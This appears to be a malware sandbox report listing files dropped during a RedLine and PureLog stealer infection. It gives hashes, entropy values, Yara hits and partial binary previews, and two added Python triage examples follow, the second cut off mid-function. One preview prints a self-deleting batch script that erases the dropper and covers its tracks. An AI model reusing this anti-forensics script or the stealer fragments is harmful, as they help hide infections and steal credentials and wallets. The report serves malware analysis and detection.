                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.....................................X.... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1531904
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.421208468027161
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:A8oREwt2ioQ3J+RusqjnhMgeiCl7G0nehbGZpbD:A8oRpoFCDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9E92F911BBB8A9E30AE5429DB45849DE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B524CF967517BCAD3240762808B300D3D1A6A4D7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CB913440A44AA38EB529EC1E1AE8E4167717BEC48C218CF933BE6E0601DF1C4F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6F3F34233228FB9A15DB1DC67F5E0AB52C2DADE6FF5CF56D6B4D6A9D10B4A737016C732D5166922EECF7A1981A4FEFB384820071F0F7EB501D02639922574F56
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@....................................%O.... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1341952
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.238598741853421
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:If8HQlDMxHwJ07wusqjnhMgeiCl7G0nehbGZpbD:IkHQlqwJ0JDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:46942B7ABE0E510CE6E5A0B565763A4E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BB3BF69FDF92E69C3820D8C9F33DD219A10201D7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:914B136D6C9CB17832C445FF6FF24F77059C3A2DB856C7332AAF473265380473
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3A950927ABAE312DB2160476430CF3B8A5C9F0BD008C9DEA6DA5D9B9F6AB11A0DDF6F2B55F956E510605F04D91DC02F2E3001F11E271866EFB4D1D1279C00945
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@.......................................... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...P.......@...:..............@...................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1534464
Entropy (8bit):7.124597160827027
Encrypted:false
SSDEEP:24576:pSEmYD6gjGPG45QVDkfXplyTyVsqjnhMgeiCl7G0nehbGZpbD:p5mYD6g2GWQVQf3yTODmg27RnWGj
MD5:77D79EE69BBFC920C23E46C9B83DC587
SHA1:EBCBBC1B72832D74F71BD43AE22060DEB4AF5FD3
SHA-256:2B46DB6266BACC141FF2C37951214CE29BE1777B2EB0E91F64F6069EE6107FF5
SHA-512:F81A462B0E2D786FDD2B25A59E26E14241E1592A6AB9912344E3B36BB1A9DC6514B73C575ED10443DE109274F9DDC506BD3DFD617E67C024CA6A66083B129C17
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
File Type:CSV text
Category:dropped
Size (bytes):425
Entropy (8bit):5.357964438493834
Encrypted:false
SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
Malicious:false
Reputation:unknown
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
Process:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):410
Entropy (8bit):5.361827289088002
Encrypted:false
SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:64A2247B3C640AB3571D192DF2079FCF
SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:false
Reputation:unknown
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):410
Entropy (8bit):5.361827289088002
Encrypted:false
SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:64A2247B3C640AB3571D192DF2079FCF
SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:false
Reputation:unknown
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):2232
Entropy (8bit):5.379401388151058
Encrypted:false
SSDEEP:48:fWSU4xc4RTmaoUeW+gZ9tK8NPZHUxL7u1iMugei/ZPUyus:fLHxcIalLgZ2KRHWLOugss
MD5:2994C26E803A806022777D377D65DCAB
SHA1:08908C5CB419064AB7F9D6C4A7BB17688B2DAFED
SHA-256:D13382ADC1CED6AB3625B6BF89052AB2C6421BE2F2522C6C0D244589E7BA9C7D
SHA-512:016517C0A50CF0AE2EED50A188969E887CB98BE009BBCE8B5B6437611769D6324CF8095778497E301855E4DE134297A399E56C42DFCDC073068F813A4CB0431C
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):587776
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.947618401040904
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:vWLLk3UrmqZ4xcVhDoba7m3GTmPe5rmLZNf/lszBaVyYQHm6Fn:v+nrt6xcd7egm2lm7KW4
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8C8785AC6585CF5C794B74330B3DB88F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:ED055892B3C942F8C3C4B4F36D6CA8ED58A037A1
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:16212629068CD8F1506D1C90CE6218DABDAC1B5F62B8414DF72F778B0813A8AE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:223836EBC9968CE6CBACBA1CC772399A55F93F8171A9C7E7A75D7DAEEA540D3273AEC5D1DEA664274D1653AFD1F792FF6C22AB41881411C75B7FA46888763DD4
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.f................................. ... ....@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......dx...:..........h...TX...........................................0..........+.(..bd(.....s....... ....( ...(.... ....( ...o.....ds......o....(.... H...( ...o....o.....s..........io.....o..........9.....o......o...........9.....o......9.....o......*.(....a..w..........}...................v+.(T..T(.....(....(....o....*...0..?.......+.(..?8s...... l...( ...(....o......o......o......o.....(....&*..0..M.......+.(.nW...................... ....( ....... ....( ....... ....(
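The Size, Entropy (8bit) and hash fields in the record above are the standard triage metrics for a dropped file, and the entropy value of 7.95 for a 587776-byte .NET PE sits very close to the 8.0 maximum, which is what a packed or encrypted payload looks like and is consistent with the packer-related signatures the report raises for this sample. The following Python is an added example, not part of the Joe Sandbox report, that recomputes those same fields for any file and adds a packing verdict. The 7.9 cutoff, the minimal PE-header check and the constructed test inputs are assumptions chosen for illustration; the real binary is not reproduced here.

```python
import hashlib
import math
from collections import Counter

# Entropy (bits per byte) above which a PE is treated as probably packed or
# carrying an encrypted payload. Assumed illustrative cutoff, not from the report.
PACKED_THRESHOLD = 7.9


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte, i.e. the report's 'Entropy (8bit)' figure.
    0.0 for a single repeated byte value, 8.0 when all 256 values are equally likely."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_hashes(data: bytes) -> dict:
    """MD5 / SHA1 / SHA-256 / SHA-512 in the upper-case form the report prints."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def is_pe(data: bytes) -> bool:
    """Cheap PE check: 'MZ' DOS stub and a 'PE\\0\\0' signature at e_lfanew (offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage(data: bytes) -> dict:
    """Build a record with the same fields as the report plus a packing verdict."""
    entropy = shannon_entropy_8bit(data)
    record = {"Size (bytes)": len(data), "Entropy (8bit)": entropy}
    record.update(file_hashes(data))
    record["PE"] = is_pe(data)
    # High entropy on its own is not proof of packing (compressed resources also
    # score high), so the verdict is only raised for files that parse as PE.
    record["LikelyPacked"] = record["PE"] and entropy >= PACKED_THRESHOLD
    return record


def fake_pe(payload: bytes) -> bytes:
    """Constructed test data: a minimal MZ header pointing at a PE signature at 0x40,
    followed by the given payload. Not a loadable binary."""
    header = bytearray(b"MZ" + b"\x00" * 0x3A)          # 0x3C bytes
    header[0x3C:0x40] = (0x40).to_bytes(4, "little")    # e_lfanew -> 0x40
    return bytes(header) + b"PE\x00\x00" + payload


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(path, triage(f.read()))
```

Run it as `python triage.py <file>` to get a record directly comparable with the report's fields. A uniformly distributed payload (the constructed `fake_pe(bytes(range(256)) * 64)`) scores just under 8.0 and is flagged; a mostly-zero payload is not.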
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):307712
Entropy (8bit):5.081289674980977
Encrypted:false
SSDEEP:3072:acZqf7D34Tp/0+mA0kywMlQEg85fB1fA0PuTVAtkxzZ3RMeqiOL2bBOA:acZqf7DItnGCQNB1fA0GTV8kv0L
MD5:3B6501FEEF6196F24163313A9F27DBFD
SHA1:20D60478D3C161C3CACB870AAC06BE1B43719228
SHA-256:0576191C50A1B6AFBCAA5CB0512DF5B6A8B9BEF9739E5308F8E2E965BF9B0FC5
SHA-512:338E2C450A0B1C5DFEA3CD3662051CE231A53388BC2A6097347F14D3A59257CE3734D934DB1992676882B5F4F6A102C7E15B142434575B8970658B4833D23676
Malicious:true
Yara Hits:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................<...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.
Process:C:\Windows\SysWOW64\svchost.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1425408
Entropy (8bit):5.68069838387253
Encrypted:false
SSDEEP:24576:Pk70Trcosu4CTPpR9+aWsqjnhMgeiCl7G0nehbGZpbD:PkQTAW5v+hDmg27RnWGj
MD5:1B1EC94BDE0A57A4A82BD2F20B2CB7F3
SHA1:EADF44C3FE2B366CFFE5A5E5232D3DB261ABDC6F
SHA-256:2F2A9608F9B6C29C0E7AA3A4E4BD4CCBBE1194CCD430A643E1EA4A684AFE6A9F
SHA-512:425451934FD68DAFBA0B72083A31E2AA9FF4CE850C89149E19318A32D1BE9E2E07448E06497DCACCC722F34239FBD17B4B1F5CD0117D97DF9B05A9CF50F19703
Malicious:true
Yara Hits:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, Author: ditekSHen
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~................0y.f....PE..L...t..P..........#................./.............@.............................................................................P....`..pg..............................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@...................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):231936
Entropy (8bit):5.039764014369673
Encrypted:false
SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:50D015016F20DA0905FD5B37D7834823
SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):164
Entropy (8bit):4.9488036015393675
Encrypted:false
SSDEEP:3:mKDDCMNvFbuov3DUkh4E2J5xAIJWAdEFKDwU1hGDUkh4E2J5xAInTRIKtTIhfBQk:hWKdbuoL923fJWAawDNe923fTr+
MD5:F1490DC2DDA4552466FC6637181BE96F
SHA1:4F2BF85BD51221A8AED0D9C2C6583FBD9279FFD6
SHA-256:2B4501A1E6DA54D9FFB01506FBEC343C5D17DA55BC6EADF3AE1891BDEC376FF6
SHA-512:4A7952625220566944D04B190C0702BF067A82FDE902C86F7A84EBD1D31A3A7D2B26F97A0593B3EB273EAE9E43905BE5846F323355703A3DE423C2E0BED61893
Malicious:false
Reputation:unknown
Preview:@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpEAAD.tmp.cmd" /f /q..
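The batch file previewed above is the classic delayed self-delete: server_BTC.exe writes a .cmd that sleeps six seconds (long enough for the writer to exit), deletes server_BTC.exe, then deletes the .cmd itself. Together with the Yara verdicts and the Entropy (8bit) scores on the surrounding records, that is what an analyst triages first in a dropped-files list. The Python below is an added example and not part of the Joe Sandbox report: it parses records in this key:value layout (a constructed sample transcribed from three records on this page, trimmed to the fields the rules read), reimplements the entropy statistic, and applies three triage rules (Yara/AV verdict, high-entropy non-PE blob, self-deleting batch). The 7.0 bits/byte threshold, the rule wording and the record keys are the example's own assumptions.

```python
"""Triage helper for Joe Sandbox 'Dropped Files' records (added example, not report code)."""
import math
import re
from collections import Counter
from pathlib import PureWindowsPath

# Constructed sample: three records transcribed from the report above, trimmed to
# the fields the rules below read. In the report, 'Process' is the process that
# wrote the dropped file, not the dropped file itself.
SAMPLE_RECORDS = r"""
Process:C:\Windows\SysWOW64\svchost.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):1425408
Entropy (8bit):5.68069838387253
Malicious:true
Yara Hits:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, Author: ditekSHen
Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Size (bytes):164
Entropy (8bit):4.9488036015393675
Malicious:false
Preview:@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpEAAD.tmp.cmd" /f /q..
Process:C:\Users\user\Desktop\AENiBH7X1q.exe
File Type:data
Size (bytes):2598912
Entropy (8bit):7.759549710225937
Malicious:false
"""

HIGH_ENTROPY = 7.0  # assumption: a non-PE blob this dense is almost always compressed or encrypted


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, the statistic behind the report's 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_records(text: str) -> list[dict]:
    """One dict per dropped file: a record starts at each 'Process:' line, bullet lines
    under 'Yara Hits:' go into rec['yara'], everything else is split on its first ':'."""
    records: list[dict] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Process:"):
            current = {"yara": []}
            records.append(current)
        if current is None:
            continue
        if line.startswith("•"):
            current["yara"].append(line.lstrip("• ").strip())
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    return records


def triage(rec: dict) -> list[str]:
    """Return human-readable reasons this dropped file deserves a look."""
    flags: list[str] = []
    if rec.get("Malicious") == "true" or rec["yara"]:
        flags.append("verdict: " + ("; ".join(rec["yara"]) or "flagged malicious"))
    ftype = rec.get("File Type", "")
    entropy = float(rec.get("Entropy (8bit)") or 0.0)
    if "PE32" not in ftype and entropy >= HIGH_ENTROPY:
        flags.append(f"high-entropy non-PE blob ({entropy:.2f} bits/byte, "
                     f"{rec.get('Size (bytes)', '?')} bytes): likely packed/encrypted stage")
    if "batch" in ftype.lower():
        preview = rec.get("Preview", "")
        writer = PureWindowsPath(rec["Process"]).name
        # DEL targets quoted in the script; the writer deleting itself is the tell.
        targets = re.findall(r'DEL\s+"([^"]+)"', preview, flags=re.IGNORECASE)
        if writer.lower() in (t.lower() for t in targets):
            flags.append(f"self-deleting dropper: {writer} wrote a batch that deletes it")
        if any(t.lower().endswith((".cmd", ".bat")) for t in targets):
            flags.append("batch removes its own script (anti-forensics)")
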